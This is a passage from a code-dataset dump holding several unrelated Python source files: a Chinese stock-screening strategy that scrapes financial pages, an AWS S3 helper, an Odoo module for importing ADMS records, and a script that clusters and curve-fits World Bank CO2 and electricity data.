tag.find_all('td')\n                        latestBanSharesPct = float(tags_[-3].string[:-1])\n        \n        # get 分红融资 page\n        tag = soup.find('a', text='分红融资')\n        link = mainLink + tag.attrs['href'][2:]\n        r = requests.get(link)\n        soup = BeautifulSoup(r.text, 'lxml')\n\n        # 历史送转记录\n        shareFactor = 1 # 股本因子\n        latestSendSharesDate = None\n\n        tag = soup.find('th', text='分红方案说明')\n        if tag is not None: # 新股有可能还没有过分红\n            tag = tag.parent.parent.parent.find('tbody')\n            tags = tag.find_all('tr')\n            \n            for tag in tags:\n                tags_ = tag.find_all('td')\n                dividendPlan = tags_[4].string # 每次的'分红方案说明'\n                newShareFactor = self._getShareFactor(dividendPlan)\n                shareFactor *= newShareFactor\n\n                # 获取最近的送转日期\n                if newShareFactor > 1 and latestSendSharesDate is None:\n                    latestSendSharesDate = str(tags_[3].string) # 送转实施日期\n\n        # 最近机构持股占流通股比例(%)\n        fundPositionsRatio, fundNbr = DyStockDataSpider.getLatestFundPositionsRatio(code)\n\n        # 财务报表里的指标\n        otherIndicators = DyStockDataSpider.getLatestFinanceReport(code, ['净利润YoY(%)', '营业收入YoY(%)', '每股收益(元)', '每股现金流(元)'])\n\n        return [navps, pfps, udpps, floatingShares, totalShares, latestReleaseDate, latestBanSharesPct, shareFactor, latestSendSharesDate, fundPositionsRatio] + otherIndicators\n\n    def onStockDays(self, code, df):\n        try:\n            values = self._getIndicators(code)\n        except Exception as ex:\n            self._info.print('从同花顺爬取[{0}: {1}]数据错误[{2}]'.format(code, self._stockAllCodes[code], self._baseDate), DyLogData.warning)\n            return\n\n        # get ['现价'] and ['流通市值(亿元)', '总市值(亿元)']\n        if df is None or df.empty:\n            if not self._errorDaysEngine.loadCode(code, [self._baseDate, 0]):\n                self._info.print('载入[{0}: {1}]日线数据错误[{2}]'.format(code, self._stockAllCodes[code], self._baseDate), DyLogData.warning)\n                return\n\n            df = self._errorDaysEngine.getDataFrame(code)\n\n        pos = self.colNames.index('流通市值(亿元)') - self.colNames.index('每股净资产(元)')\n        close = df.ix[-1, 'close']\n        marketValues = [values[pos - 2]*close, values[pos - 1]*close]\n\n        # get 股票上市日期\n        marketDate = self._errorDaysEngine.getStockMarketDate(code, name=self._stockAllCodes[code])\n        if marketDate is None:\n            self._info.print('获取[{0}: {1}]上市日期错误'.format(code, self._stockAllCodes[code]), DyLogData.warning)\n            return\n\n        # combine; note that value positions should be aligned with @colNames\n        self.__data[code] = [self._stockAllCodes[code]] + [close] + values[:pos] + marketValues + values[pos:] + [marketDate]\n\n    def onDone(self):\n        df = pd.DataFrame(self.__data).T\n        start = self.colNames.index('每股净资产(元)')\n        df.rename(columns={i: x for i, x in enumerate(['名称', '现价'] + self.colNames[start:])}, inplace=True)\n\n        # add scores, default\n        colNames = ['每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)',\n                    '总股本(亿)', '流通A股(亿)',\n                    '现价',\n                    '最近解禁日期', '解禁股占总股本比例(%)',\n                    '股本因子',\n                    '最近送转日期',\n                    '机构持股占流通股比例(%)',\n                    '营业收入YoY(%)'\n                    ]\n\n        df = self.__class__._addScores(df, colNames)\n\n        # set result\n        if self._selectStockNbr > 0:\n            df = df.ix[:self._selectStockNbr]\n\n        df.reset_index(inplace=True)\n\n        self._result = df.values.tolist()\n\n    def _addScores(df, colNames):\n        \"\"\"\n        @df: index is code, and no ['排名', '得分'] columns\n        @colNames: [colName], in which column is taken for calculating scores\n        \"\"\"\n        columns = list(df.columns)\n        newColumns = columns[:1] + ['排名', '得分'] + columns[1:]\n\n        seriesList = []\n\n        # rank each indicator; think of the rank as a score: the higher, the better\n        if '每股净资产(元)' in colNames:\n            series = df['每股净资产(元)'].rank()\n            seriesList.append(series)\n\n        if '每股公积金(元)' in colNames:\n            series = df['每股公积金(元)'].rank()\n            seriesList.append(series)\n\n        if '每股未分配利润(元)' in colNames:\n            series = 
df['每股未分配利润(元)'].rank()\n            seriesList.append(series)\n\n        if '总股本(亿)' in colNames:\n            series = df['总股本(亿)'].rank(ascending=False)\n            seriesList.append(series)\n\n        if '流通A股(亿)' in colNames:\n            series = df['流通A股(亿)'].rank(ascending=False)\n            seriesList.append(series)\n\n        if '现价' in colNames:\n            series = df['现价'].rank(ascending=False)\n            seriesList.append(series)\n\n        if '最近解禁日期' in colNames:\n            series = df['最近解禁日期'].fillna('3000-01-01').rank(ascending=False)\n            seriesList.append(series)\n\n        if '解禁股占总股本比例(%)' in colNames:\n            series = df['解禁股占总股本比例(%)'].fillna(0).rank()\n            seriesList.append(series)\n\n        if '股本因子' in colNames:\n            series = df['股本因子'].rank(ascending=False)\n            seriesList.append(series)\n\n        if '最近送转日期' in colNames:\n            # '最近送转日期', 若没有送转,则用上市日期替代\n            series1 = df['最近送转日期']\n            series2 = df['上市日期'][series1.isnull()]\n            series1 = series1[series1.notnull()]\n            series = pd.concat([series1, series2])\n\n            series = series.rank(ascending=False)\n            seriesList.append(series)\n\n        if '机构持股占流通股比例(%)' in colNames:\n            series = df['机构持股占流通股比例(%)'].rank(ascending=False)\n            seriesList.append(series)\n\n        if '营业收入YoY(%)' in colNames:\n            series = df['营业收入YoY(%)'].rank()\n            seriesList.append(series)\n\n        if '净利润YoY(%)' in colNames:\n            series = df['净利润YoY(%)'].rank()\n            seriesList.append(series)\n\n        if '每股收益(元)' in colNames:\n            series = df['每股收益(元)'].rank()\n            seriesList.append(series)\n\n        if '每股现金流(元)' in colNames:\n            series = df['每股现金流(元)'].rank()\n            seriesList.append(series)\n\n        # concat to rank DF\n        rankDf = pd.concat(seriesList, axis=1)\n\n        # total rank\n        scoreSeries = rankDf.sum(axis=1)*100/(len(seriesList) * rankDf.shape[0])\n        scoreSeries.sort_values(ascending=False, inplace=True)\n        scoreSeries.name = '得分'\n\n        rankSeries = scoreSeries.rank(ascending=False)\n        rankSeries.name = '排名'\n\n        df = pd.concat([df, scoreSeries, rankSeries], axis=1)\n        df = df.reindex(columns=newColumns)\n\n        df = df.ix[scoreSeries.index]\n\n        return df\n\n    def refactory(df, params):\n        \"\"\"\n        @return: new rows list\n        \"\"\"\n        # clean\n        df.set_index('代码', inplace=True)\n        del df['排名']\n        del df['得分']\n\n        # parse @params\n        colNames = []\n        for key, value in params.items():\n            if value == 1:\n                colNames.append(key)\n\n        # add scores\n        df = DySS_High2SendStocks._addScores(df, colNames)\n\n        df.reset_index(inplace=True)\n        return df.values.tolist()\n\n    def getRefactoryParams():\n        pos = DySS_High2SendStocks.colNames.index('得分') + 1\n\n        colNames = ['每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)',\n                    '总股本(亿)',\n                    '股本因子']\n\n        return ['列名', '值(0:不使用,1:使用)'], [[x, 1] if x in colNames else [x, 0] for x in DySS_High2SendStocks.colNames[pos:]]","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Select/Strategy/Fundamental/DySS_High2SendStocks.py","file_name":"DySS_High2SendStocks.py","file_ext":"py","file_size_in_byte":15074,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"} +{"seq_id":"30708172660","text":"import logging\nimport boto3\nfrom botocore.exceptions import ClientError\n\ndef create_bucket(bucket_name, region=None):\n\t# Create bucket\n\ttry:\n\t\tif region is None:\n\t\t\ts3_client = boto3.client('s3')\n\t\t\ts3_client.create_bucket(Bucket=bucket_name)\n\t\telse:\n\t\t\ts3_client = boto3.client('s3', region_name=region)\n\t\t\tlocation = {'LocationConstraint': region}\n\t\t\ts3_client.create_bucket(Bucket=bucket_name,\n\t\t\t\t\t\t\t\t\tCreateBucketConfiguration=location)\n\texcept ClientError as e:\n\t\tlogging.error(e)\n\t\treturn False\n\treturn True\n\ndef put_object(bucket_name, key, value):\n\ttry:\n\t\ts3_client = 
boto3.client('s3')\n\t\ts3_client.put_object(Bucket=bucket_name, Key=key, Body=value)\n\texcept ClientError as e:\n\t\tlogging.error(e)\n\t\treturn False\n\treturn True\n\t\ndef get_object(bucket_name, key):\n\ttry:\n\t\ts3_client = boto3.client('s3')\n\t\tresult = s3_client.get_object(Bucket=bucket_name, Key=key)\n\texcept ClientError as e:\n\t\tlogging.error(e)\n\t\treturn None\n\treturn result\n\t\n# edit main\ndef main():\n\t#create_bucket('edu.au.cc.image-gallery','us-east-2')\n\tput_object('edu.au.cc.python-image-gallery', 'HELLO', 'WORLD')\n\tprint (get_object('edu.au.cc.python-image-gallery', 'HELLO'))\n\tprint (get_object('edu.au.cc.python-image-gallery', 'HELLO')['Body'].read())\nif __name__ == '__main__':\n\tmain()\n","repo_name":"Dalbert1/m2-ig","sub_path":"gallery/tools/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74609024193","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api\nfrom lxml.builder import E\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n# Model exception\nmodel_exception = []\n\n\nclass BaseModel(models.AbstractModel):\n    _inherit = 'base'\n\n    @api.model_create_multi\n    @api.returns('self', lambda value: value.id)\n    def adms_import(self, list_vals):\n        model = self.env['ir.model'].sudo().search([('model', '=', self._name)], limit=1)\n\n        for vals in list_vals:\n            # 0. The Business Type needs to be defined here; no matter what, the header and children\n            # should always be on the same business type\n            business_type = False\n            business_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n            company_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'res.company' and x.ttype == 'many2one')\n            if business_type_field:\n                business_type_adms_key = 'x_studio_adms_id_' + business_type_field.name\n                for key in vals:\n                    if key == business_type_adms_key:\n                        business_type = self.env['fal.business.type'].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n            # 1. Translate any adms_id field into standard field\n            new_vals = self.iterate_and_compute(model, vals, business_type)\n            # 2. Determine whether to create a new record or write to an existing one.\n            # To determine whether a record with the same ID exists, we cannot rely on x_studio_adms_id alone,\n            # because on ADMS the databases are separate for each company.\n            # So the unique key is the combination of Business type + ADMS ID.\n            # An extra issue is that some objects do not have a Business type\n            # ----------------------------\n            # If the business type field is present, search by adms_id + business type\n            # TODO: some exception objects are handled below\n            domain = [('x_studio_adms_id', '=', vals['x_studio_adms_id'])]\n            # Special case for Partner. ADMS splits its partners into customer and vendor,\n            # and both tables take a different approach\n            if model.model in ['res.partner']:\n                # If a customer, do not search by the business type. 
Only the company\n # And do not find in partner that is vendor\n # Means that customer and vendor can have the same ADMS ID\n if 'customer_rank' in new_vals and new_vals['customer_rank'] > 0:\n domain += [(company_type_field.name, '=', new_vals[company_type_field.name])]\n domain += [('customer_rank', '>', 0)]\n else:\n domain += [(company_type_field.name, '=', new_vals[company_type_field.name])]\n domain += [(business_type_field.name, '=', new_vals[business_type_field.name])]\n domain += [('supplier_rank', '>', 0)]\n # Special case for x_studio_reason_code, do not find company/business type\n # Means do nothing\n elif model.model in ['x_reason_adms']:\n pass\n elif business_type_field and model.model not in model_exception:\n domain += [(business_type_field.name, '=', new_vals[business_type_field.name])]\n similar_adms_id = self.sudo().search(domain)\n if similar_adms_id:\n # Before writing, make sure that this object method hasn't been called\n able_overwrite = self.check_method(model, similar_adms_id)\n if able_overwrite:\n result = similar_adms_id.sudo().write(new_vals)\n return similar_adms_id\n else:\n result = self.sudo().create(new_vals)\n return result\n return \"Something Went Wrong\"\n\n def iterate_and_compute(self, model, vals, business_type):\n new_vals = {}\n # We want business type to be searched upfront, so whatever the sequence of input\n # There will be no error\n business_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n if business_type_field:\n business_type_adms_key = 'x_studio_adms_id_' + business_type_field.name\n # Also find the Company field as we want to fill it automatically when we found the business type\n company_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'res.company' and x.ttype == 'many2one')\n\n # For every field in vals\n for key in vals:\n # If it's list. 
It can means 2 possibilities\n # Either create new record, or link (usually many2many)\n if isinstance(vals[key], list):\n # Need to change the model to the list field model\n field = self.env['ir.model.fields'].sudo().search([('model_id', '=', model.id), ('name', '=', key)])\n new_model = self.env['ir.model'].sudo().search([('model', '=', field.relation)], limit=1)\n component_business_type_field = new_model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n # One2many component of API call set did not \"have\" ADMS ID\n # At first we do not know this, so for work around, we just don't need to\n # find out if component already have ADMS id, just always unlink all and\n # create a new one\n new_vals[key] = []\n new_vals[key] += [(5, 0, 0)]\n for o2m in vals[key]:\n # If it's 0, Means we need to define if it's creating new object or just\n # editing it by checking the adms id\n # If it's 6, Means we only relate the id, and so just need to find out the\n # real id\n if o2m[0] == 0:\n res = self.iterate_and_compute(new_model, o2m[2], business_type)\n new_vals[key] += [(0, 0, res)]\n elif o2m[0] == 6:\n new_o2mid = []\n # Here we want to map between the ADMS id given by API to Odoo ID\n for o2mid in o2m[2]:\n # If Tax, need to know if it's for sale/purchase\n if new_model.model in ['account.tax']:\n if model.model in ['x_po_tax', 'purchase.order.line']:\n new_o2mid.append(self.env[new_model.model].sudo().search([('x_studio_adms_id', '=', o2mid), (component_business_type_field.name, '=', business_type.id), ('type_tax_use', '=', 'purchase')], limit=1).id)\n else:\n new_o2mid.append(self.env[new_model.model].sudo().search([('x_studio_adms_id', '=', o2mid), (component_business_type_field.name, '=', business_type.id), ('type_tax_use', '=', 'sale')], limit=1).id)\n else:\n new_o2mid.append(self.env[new_model.model].sudo().search([('x_studio_adms_id', '=', o2mid), (component_business_type_field.name, '=', business_type.id)], limit=1).id)\n new_vals[key] = [(6, 0, new_o2mid)]\n # If it's a share id field for many2one relation\n # Find the object based on field search\n elif \"x_studio_adms_id_\" in key:\n # We try to get the real field name\n # It's always the 18th word\n field_name = key[17:]\n field = self.env['ir.model.fields'].sudo().search([('model_id', '=', model.id), ('name', '=', field_name)])\n # We want to find real_id of x_studio_adms_id field because they throw\n # adms id\n # Here, we do not only find based by adms id but also, if the object have\n # business type, need to be searched on business type\n\n # But, iF the key is business type, we do not want to search on business type.\n # Obviously, it doesn't have business type\n if business_type_field and key == business_type_adms_key:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n # If it's Business type, means we automatically find the company\n new_vals[company_type_field.name] = real_id.company_id.id\n # Except that\n else:\n # If business type is present\n # also include on our search business type domain\n m2o_model = self.env['ir.model'].sudo().search([('model', '=', field.relation)])\n m2o_business_type = m2o_model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n m2o_company = 
m2o_model.field_id.sudo().filtered(lambda x: x.relation == 'res.company' and x.ttype == 'many2one')\n # Special case for res.users object.\n # It will always have 2 many2one related to business type, because mirror\n # behavior of company\n if m2o_model.model == 'res.users':\n m2o_business_type = m2o_model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name == 'fal_business_type')\n # Special case for Partner. Because ADMS split it's partner to customer and vendor\n # Both table have different approach\n if m2o_model.model in ['res.partner']:\n # Split between Customer / Vendor Transaction.\n if model.model in ['purchase.order', 'purchase.order.line']:\n # Let's find it on business type level first, if not found, search again on company level\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), (m2o_company.name, '=', business_type.company_id.id), ('supplier_rank', '>', 0)], limit=1)\n if not real_id:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_company.name, '=', business_type.company_id.id), ('supplier_rank', '>', 0)], limit=1)\n else:\n # Let's find it on business type level first, if not found, search again on company level\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), (m2o_company.name, '=', business_type.company_id.id), ('customer_rank', '>', 0)], limit=1)\n if not real_id:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_company.name, '=', business_type.company_id.id), ('customer_rank', '>', 0)], limit=1)\n elif m2o_model.model in ['x_reason_adms']:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n elif m2o_model.model in ['account.tax']:\n if model.model in ['x_po_tax', 'purchase.order.line']:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), ('type_tax_use', '=', 'purchase')], limit=1)\n else:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id), ('x_studio_adms_id', '=', vals[key]), ('type_tax_use', '=', 'sale')], limit=1)\n elif business_type and m2o_business_type and m2o_model.model not in model_exception:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_business_type.name, '=', business_type.id)], limit=1)\n # Let's find it on business type level first, if not found, search again on company level\n if not real_id:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key]), (m2o_company.name, '=', business_type.company_id.id)], limit=1)\n # If the object doesn't have business type\n else:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n new_vals[key[17:]] = real_id.id\n new_vals[key] = vals[key]\n # Other field we just copy-paste\n else:\n new_vals[key] = vals[key]\n return new_vals\n\n def check_method(self, model, record):\n if model.model == 'purchase.order':\n if record.x_studio_journal_apvo or record.x_studio_journal_apvo_retur:\n return False\n else:\n return True\n elif model.model == 'x_adms_po_header':\n if record.x_studio_issue_journal:\n return False\n else:\n return True\n elif model.model == 
'sale.order':\n if record.x_studio_issue_entry or record.invoice_ids or record.x_studio_transfer_journal or record.x_studio_issue_journal_cancel or record.x_studio_invoice_journal_cancel:\n return False\n else:\n return True\n elif model.model == 'x_spk_payment_multi':\n if record.x_studio_bon_merah:\n return False\n else:\n return True\n elif model.model == 'x_spk_payment':\n if record.x_studio_bon_hijau:\n return False\n else:\n return True\n elif model.model == 'x_inventory_transfer':\n if record.x_studio_journal_keluar_1 or record.x_studio_journal_masuk_2 or record.x_studio_journal_masuk:\n return False\n else:\n return True\n elif model.model == 'x_importinvadj':\n if record.x_studio_journal_out or record.x_studio_journal_in:\n return False\n else:\n return True\n return True\n","repo_name":"dionisiotorres/atists","sub_path":"fal_arista_adms_helper/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18867163879","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 15 12:59:23 2023\n\n@author: User\n\"\"\"\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.optimize as opt\nimport seaborn as sns\nfrom sklearn import cluster\nimport err_ranges as err\n\ndef data_(filename):\n \"\"\"\n Parameters\n ----------\n filename : TYPE\n DESCRIPTION.\n\n Returns\n -------\n d_t : TYPE\n DESCRIPTION.\n data : TYPE\n DESCRIPTION.\n\n \"\"\"\n data = pd.read_csv(filename)\n data = pd.DataFrame(data)\n print(data) \n print(data.columns)\n # drop null values in rows as part of data cleaning\n data = data.drop([\"Indicator Code\",\"Indicator Name\",\"Country Code\",\"2021\",\"2020\"],axis=1)\n # replacing the NaN value with 0\n data = data.replace(np.NaN,0)\n # choosing the country\n u = [\"Benin\",\"Bangladesh\",\"Bahrain\",\"Brazil\",\"Colombia\",\"Canada\"]\n # checking the value in is in function\n dt = data[\"Country Name\"].isin(u)\n data = data[dt]\n print(data)\n # transposing the data\n d_t = np.transpose(data)\n # resetting the index\n d_t = d_t.reset_index()\n # renaming thge value\n d_t = d_t.rename(columns={\"index\":\"year\"})\n d_t = d_t.drop(0,axis=0)\n #data = data.iloc[:,0:10]\n d_t = d_t.rename(columns={18:\"Benin\",20:\"Bangladesh\",22:\"Bahrain\",29:\"Brazil\",35:\"Colombia\",45:\"Canada\"})\n d_t[\"year\"] = pd.to_numeric(d_t[\"year\"])\n d_t[\"Bahrain\"] = pd.to_numeric(d_t[\"Bahrain\"])\n d_t[\"Brazil\"] = pd.to_numeric(d_t[\"Brazil\"])\n d_t[\"Canada\"] = pd.to_numeric(d_t[\"Canada\"])\n d_t = d_t.dropna()\n return d_t,data\ndef exp_(t,n0, g):\n \"\"\"\n Calculates the logistic function with scale factor n0 and growth rate g\n\n \"\"\"\n t = t - 1960.0\n f = n0 * np.exp(g*t)\n return f\ndef set_mat(country):\n \"\"\"\n function to show scatter_matrix of each country \n \"\"\"\n pd.plotting.scatter_matrix(country, figsize=(14.0, 12.0))\n plt.tight_layout()\n plt.show()\n# calling function for filename\nbdata,borg = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\Birth rate, crude (per 1,000 people).csv\")\npop,poporg = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\Population, total.csv\")\nEPC,EPC_org = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\Electric power consumption (kWh per capita).csv\")\nco2_emmission,co2_emmission_org = data_(\"D:\\\\applaid_last_prj\\\\data_set\\\\CO2 emissions (kt).csv\")\n# creating behrain as a dataframe and adding another indicators to it\nBahrain = 
pd.DataFrame()\nBahrain[\"Year\"] = bdata[\"year\"]\nBahrain[\"Population_total\"] = pop[\"Bahrain\"]\nBahrain[\"Electric_power_consumption\"] = EPC[\"Bahrain\"]\nBahrain[\"co2_emission\"] = co2_emmission[\"Bahrain\"]\nBahrain = Bahrain.iloc[30:60,:]\n# creating Brazil as a dataframe and adding another indicators to it\nBrazil = pd.DataFrame()\nBrazil[\"Year\"] = bdata[\"year\"]\nBrazil[\"Population_total\"] = pd.to_numeric(pop[\"Brazil\"])\nBrazil[\"Electric_power_consumption\"] = EPC[\"Brazil\"]\nBrazil[\"co2_emission\"] = co2_emmission[\"Brazil\"]\nBrazil = Brazil.iloc[30:69,:]\n# creating Canada as a dataframe and adding another indicators to it\nCanada = pd.DataFrame()\nCanada[\"Year\"] = bdata[\"year\"]\nCanada[\"Population_total\"] = pd.to_numeric(pop[\"Canada\"])\nCanada[\"Electric_power_consumption\"] = EPC[\"Canada\"]\nCanada[\"co2_emission\"] = co2_emmission[\"Canada\"]\nCanada = Canada.iloc[30:60,:]\n\n# calling the function\nset_mat(Bahrain)\nset_mat(Brazil)\nset_mat(Canada)\n\n# plotting the correlation of bahrain\nplt.figure()\nplt.title(\"Correlation map of Bahrain\")\ncor = Bahrain.corr()\nsns.heatmap(data=cor,annot=False,cmap=\"jet\")\nplt.show() \n \n# kmean clustering Bahrain\nkmean = cluster.KMeans(n_clusters=2,max_iter=30)\n# reshaping \nptlg = np.array(Bahrain[\"Electric_power_consumption\"]).reshape(-1,1)\nspe = np.array(Bahrain[\"co2_emission\"]).reshape(-1,1)\n# concatinte \ncl = np.concatenate((ptlg,spe),axis=1)\n# fitting the model\nkmean = kmean.fit(cl)\n# assignining the label\nlabel = kmean.labels_\n# finding the centers for cluster\nkm_c = kmean.cluster_centers_\ncol = [\"Electric_power_consumption\",\"co2_emission\"]\nlabels = pd.DataFrame(label,columns=['Cluster ID'])\nresult = pd.DataFrame(cl,columns=col)\n# concat result and labels\nres = pd.concat((result,labels),axis=1)\n# plotting the cluster\nplt.figure()\nplt.title(\"BAHRAIN Electric_power_consumption vs co2_emission \")\nplt.scatter(res[\"Electric_power_consumption\"],res[\"co2_emission\"],c=label,cmap=\"jet\")\nplt.xlabel(\"Electric_power_consumption\")\nplt.ylabel(\"co2_emission\")\n# plotting centers of clusters\nfor ic in range(2):\n xc, yc = km_c[ic,:]\n plt.plot(xc, yc, \"dk\", markersize=7,c=\"black\")\nplt.show()\n\n# kmean clustering Brazil\nkmean = cluster.KMeans(n_clusters=2,max_iter=30)\n# reshaping \nptlg = np.array(Brazil[\"Electric_power_consumption\"]).reshape(-1,1)\nspe = np.array(Brazil[\"co2_emission\"]).reshape(-1,1)\n# concatinte \ncl = np.concatenate((ptlg,spe),axis=1)\n# fitting the model\nkmean = kmean.fit(cl)\n# assignining the label\nlabel = kmean.labels_\n# finding the centers of cluster\nkm_c = kmean.cluster_centers_\ncol = [\"Electric_power_consumption\",\"co2_emission\"]\nlabels = pd.DataFrame(label,columns=['Cluster ID'])\nresult = pd.DataFrame(cl,columns=col)\nres = pd.concat((result,labels),axis=1)\nplt.figure()\nplt.title(\"BRAZIL Electric_power_consumption vs co2_emission \")\nplt.scatter(res[\"Electric_power_consumption\"],res[\"co2_emission\"],c=label,cmap=\"jet\")\nplt.xlabel(\"Electric_power_consumption\")\nplt.ylabel(\"co2_emission\")\nfor ic in range(2):\n xc, yc = km_c[ic,:]\n plt.plot(xc, yc, \"dk\", markersize=7,c=\"black\")\nplt.show()\n\n# kmean clustering Canada\nkmean = cluster.KMeans(n_clusters=2,max_iter=30)\n# reshaping \nptlg = np.array(Canada[\"Electric_power_consumption\"]).reshape(-1,1)\n# reshaping \nspe = np.array(Canada[\"co2_emission\"]).reshape(-1,1)\n# concatinate\ncl = np.concatenate((ptlg,spe),axis=1)\n# fitting the model\nkmean = 
kmean.fit(cl)\n# assigning the label\nlabel = kmean.labels_\n# finding the centers of cluster\nkm_c = kmean.cluster_centers_\ncol = [\"Electric_power_consumption\",\"co2_emission\"]\nlabels = pd.DataFrame(label,columns=['Cluster ID'])\nresult = pd.DataFrame(cl,columns=col)\nres = pd.concat((result,labels),axis=1)\n# plotting the cluster\nplt.figure()\nplt.title(\"CANADA Electric_power_consumption vs co2_emission \")\nplt.scatter(res[\"Electric_power_consumption\"],res[\"co2_emission\"],c=label,cmap=\"jet\")\nplt.xlabel(\"Electric_power_consumption\")\nplt.ylabel(\"co2_emission\")\nfor ic in range(2):\n    xc, yc = km_c[ic,:]\n    plt.plot(xc, yc, \"dk\", markersize=7,c=\"black\")\nplt.show()\n\n# Bahrain\n# normalising the value\nBahrain[\"NORM_CO2_emission\"] = Bahrain[\"co2_emission\"]/Bahrain[\"co2_emission\"].abs().max()\nprint(Bahrain)\n# curve fitting\nparam,cparm = opt.curve_fit(exp_,Bahrain[\"Year\"],Bahrain[\"NORM_CO2_emission\"],p0=[4e8,0.2])\n# error value\nsigma = np.sqrt(np.diag(cparm))\n# assigning low and up error ranges\nlow,up = err.err_ranges(Bahrain[\"Year\"],exp_,param,sigma)\nBahrain[\"fit\"] = exp_(Bahrain[\"Year\"],*param)\n# plotting the fit with error ranges\nplt.figure()\nBahrain.plot(\"Year\",[\"NORM_CO2_emission\",\"fit\"])\nplt.fill_between(Bahrain[\"Year\"],low,up,alpha=0.5)\nplt.legend()\nplt.show()\n# plotting the prediction\nplt.figure()\nplt.title(\"CO2 emission of Bahrain\")\nplt.plot(Bahrain[\"Year\"],Bahrain[\"NORM_CO2_emission\"],label=\"Bahrain\")\n# taking some extra years for prediction\npred_year = np.arange(1990,2040)\nbpred = exp_(pred_year,*param)\nplt.plot(pred_year,bpred,label=\"prediction\")\nplt.legend()\nplt.show()\n\n# BRAZIL\n# normalising the value\nBrazil[\"NORM_CO2_emission\"] = Brazil[\"co2_emission\"]/Brazil[\"co2_emission\"].abs().max()\n#curve fitting\nparam,cparm = opt.curve_fit(exp_,Brazil[\"Year\"],Brazil[\"NORM_CO2_emission\"],p0=[4e8,0.1])\nprint(*param)\n# error value\nsigma = np.sqrt(np.diag(cparm))\n# assigning low and up error ranges\nlow,up = err.err_ranges(Brazil[\"Year\"],exp_,param,sigma)\nBrazil[\"fit\"] = exp_(Brazil[\"Year\"],*param)\n# plotting the fit with error ranges\nplt.figure()\nBrazil.plot(\"Year\",[\"NORM_CO2_emission\",\"fit\"])\nplt.fill_between(Brazil[\"Year\"],low,up,alpha=0.5)\nplt.show()\n# plotting the prediction\nplt.figure()\nplt.title(\"CO2 emission of BRAZIL\")\nplt.plot(Brazil[\"Year\"],Brazil[\"NORM_CO2_emission\"],label=\"Brazil\")\npred_year = np.arange(1990,2040)\nbrapred = exp_(pred_year,*param)\nplt.plot(pred_year,brapred,label=\"prediction\")\nplt.legend()\nplt.show()\n\n# CANADA\n# normalising the value\nCanada[\"NORM_CO2_emission\"] = Canada[\"co2_emission\"]/Canada[\"co2_emission\"].abs().max()\n#curve fitting\nparam,cparm = opt.curve_fit(exp_,Canada[\"Year\"],Canada[\"NORM_CO2_emission\"],p0=(73233967692.102798,0.04))\nprint(*param)\n# error value (recompute sigma from this fit's covariance instead of reusing Brazil's)\nsigma = np.sqrt(np.diag(cparm))\n# assigning low and up error ranges\nlow,up = err.err_ranges(Canada[\"Year\"],exp_,param,sigma)\nCanada[\"fit\"] = exp_(Canada[\"Year\"],*param)\n# plotting the fit with error ranges\nplt.figure()\nCanada.plot(\"Year\",[\"NORM_CO2_emission\",\"fit\"])\nplt.fill_between(Canada[\"Year\"],low,up,alpha=0.5)\nplt.legend()\nplt.show()\n# plotting the prediction\nplt.figure()\nplt.title(\"CO2 emission of CANADA\")\nplt.plot(Canada[\"Year\"],Canada[\"NORM_CO2_emission\"],label=\"Canada\")\npred_year = np.arange(1990,2040)\ncapred = 
